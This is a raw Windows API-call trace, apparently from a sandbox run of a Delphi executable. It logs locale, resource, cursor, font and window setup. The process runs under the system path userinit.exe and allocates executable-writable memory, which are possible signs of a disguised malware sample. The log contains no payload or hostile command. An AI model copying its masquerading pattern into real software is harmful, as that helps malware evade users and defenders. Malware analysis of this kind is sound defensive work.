[0209.321] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0209.322] GetThreadLocale () returned 0x409
[0209.322] GetThreadLocale () returned 0x409
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Jan") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="January") returned 8
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Feb") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="February") returned 9
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Mar") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="March") returned 6
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Apr") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="April") returned 6
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="May") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="May") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Jun") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="June") returned 5
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Jul") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="July") returned 5
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Aug") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="August") returned 7
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Sep") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="September") returned 10
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Oct") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="October") returned 8
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Nov") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="November") returned 9
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Dec") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="December") returned 9
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Sun") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Sunday") returned 7
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Mon") returned 4
[0209.322] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Monday") returned 7
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Tue") returned 4
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Tuesday") returned 8
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Wed") returned 4
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Wednesday") returned 10
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Thu") returned 4
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Thursday") returned 9
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Fri") returned 4
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Friday") returned 7
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Sat") returned 4
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x1af9b8, cchData=256 | out: lpLCData="Saturday") returned 9
[0209.323] GetThreadLocale () returned 0x409
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x1afa14, cchData=256 | out: lpLCData="$") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x1afa14, cchData=256 | out: lpLCData="0") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x1afa14, cchData=256 | out: lpLCData="0") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x1afb0c, cchData=2 | out: lpLCData=",") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x1afb0c, cchData=2 | out: lpLCData=".") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x1afa14, cchData=256 | out: lpLCData="2") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x1afb0c, cchData=2 | out: lpLCData="/") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x1afa14, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0209.323] GetThreadLocale () returned 0x409
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1af9e0, cchData=256 | out: lpLCData="1") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x1afa14, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0209.323] GetThreadLocale () returned 0x409
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1af9e0, cchData=256 | out: lpLCData="1") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x1afb0c, cchData=2 | out: lpLCData=":") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x1afa14, cchData=256 | out: lpLCData="AM") returned 3
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x1afa14, cchData=256 | out: lpLCData="PM") returned 3
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x1afa14, cchData=256 | out: lpLCData="0") returned 2
[0209.323] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x1afa14, cchData=256 | out: lpLCData="0") returned 2
[0209.324] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x1afa14, cchData=256 | out: lpLCData="0") returned 2
[0209.324] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x1afb0c, cchData=2 | out: lpLCData=",") returned 2
[0209.324] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0209.324] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0209.324] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0209.324] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0209.324] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0209.324] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0209.324] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0209.324] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0209.324] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0209.324] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0209.324] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0209.325] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0209.326] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0209.326] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0209.326] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0209.326] GetDC (hWnd=0x0) returned 0x9101084b
[0209.326] GetDeviceCaps (hdc=0x9101084b, index=90) returned 96
[0209.326] ReleaseDC (hWnd=0x0, hDC=0x9101084b) returned 1
[0209.326] GetDC (hWnd=0x0) returned 0x9101084b
[0209.326] GetDeviceCaps (hdc=0x9101084b, index=104) returned 0
[0209.326] ReleaseDC (hWnd=0x0, hDC=0x9101084b) returned 1
[0209.326] CreatePalette (plpal=0x1af770) returned 0xb7080851
[0209.326] GetStockObject (i=7) returned 0x1b00017
[0209.326] GetStockObject (i=5) returned 0x1900015
[0209.326] GetStockObject (i=13) returned 0x18a002e
[0209.326] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0209.326] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0209.327] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0209.327] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0209.328] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0209.329] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x1af76c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0209.329] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0209.329] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0209.329] GetVersion () returned 0x1db10106
[0209.330] GetCurrentProcessId () returned 0x998
[0209.330] GlobalAddAtomA (lpString="Delphi00000998") returned 0xc0e7
[0209.330] GetCurrentThreadId () returned 0x994
[0209.330] GlobalAddAtomA (lpString="ControlOfs0040000000000994") returned 0xc0e6
[0209.330] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000994") returned 0xc18e
[0209.330] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0209.330] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0209.330] GetSystemMetrics (nIndex=19) returned 1
[0209.337] GetSystemMetrics (nIndex=75) returned 1
[0209.337] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x651310, fWinIni=0x0 | out: pvParam=0x651310) returned 1
[0209.338] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0209.338] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0209.338] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x9011b
[0209.338] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0209.338] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0209.338] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0209.338] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x16022d
[0209.338] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x130229
[0209.339] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x14021d
[0209.339] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x140219
[0209.339] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x150217
[0209.339] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x140215
[0209.339] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0209.339] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0209.340] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0209.340] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0209.340] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0209.340] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0209.340] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0209.340] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0209.340] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0209.340] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0209.340] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0209.340] GetDC (hWnd=0x0) returned 0x9101084b
[0209.340] GetDeviceCaps (hdc=0x9101084b, index=90) returned 96
[0209.340] ReleaseDC (hWnd=0x0, hDC=0x9101084b) returned 1
[0209.340] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0209.340] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x65155c) returned 1
[0209.340] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x1afad7, fWinIni=0x0 | out: pvParam=0x1afad7) returned 1
[0209.340] CreateFontIndirectA (lplf=0x1afad7) returned 0x4d0a089b
[0209.341] GetObjectA (in: h=0x4d0a089b, c=60, pv=0x1af8c8 | out: pv=0x1af8c8) returned 60
[0209.341] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x1af983, fWinIni=0x0 | out: pvParam=0x1af983) returned 1
[0209.341] CreateFontIndirectA (lplf=0x1afa5f) returned 0x970a0862
[0209.341] GetObjectA (in: h=0x970a0862, c=60, pv=0x1af8c8 | out: pv=0x1af8c8) returned 60
[0209.341] CreateFontIndirectA (lplf=0x1afa23) returned 0x9d0a0835
[0209.341] GetObjectA (in: h=0x9d0a0835, c=60, pv=0x1af8c8 | out: pv=0x1af8c8) returned 60
[0209.341] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0209.341] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x1afa37, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0209.341] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x1afa37 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0209.341] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0209.342] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x1af9ec | out: lpWndClass=0x1af9ec) returned 0
[0209.342] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0209.342] GetSystemMetrics (nIndex=0) returned 1440
[0209.342] GetSystemMetrics (nIndex=1) returned 900
[0209.342] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x1601e8
[0209.347] SetWindowLongA (hWnd=0x1601e8, nIndex=-4, dwNewLong=856047) returned 4219500
[0209.347] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0209.347] SendMessageA (hWnd=0x1601e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0209.347] DefWindowProcA (hWnd=0x1601e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0209.360] DefWindowProcA (hWnd=0x1601e8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x10020d
[0209.361] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0209.362] SetClassLongA (hWnd=0x1601e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0209.362] GetSystemMenu (hWnd=0x1601e8, bRevert=0) returned 0x1001a9
[0209.364] DeleteMenu (hMenu=0x1001a9, uPosition=0xf030, uFlags=0x0) returned 1
[0209.364] DeleteMenu (hMenu=0x1001a9, uPosition=0xf000, uFlags=0x0) returned 1
[0209.364] DeleteMenu (hMenu=0x1001a9, uPosition=0xf010, uFlags=0x0) returned 1
[0209.364] GetKeyboardLayoutList (in: nBuff=64, lpList=0x1af9b8 | out: lpList=0x1af9b8) returned 1
[0209.366] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0209.366] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0209.366] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d6b0000
[0209.366] GetProcAddress (hModule=0x6d6b0000, lpProcName="InitializeFlatSB") returned 0x6d6e266f
[0209.366] GetProcAddress (hModule=0x6d6b0000, lpProcName="UninitializeFlatSB") returned 0x6d6e2542
[0209.367] GetProcAddress (hModule=0x6d6b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d6e1d29
[0209.367] GetProcAddress (hModule=0x6d6b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d6e238d
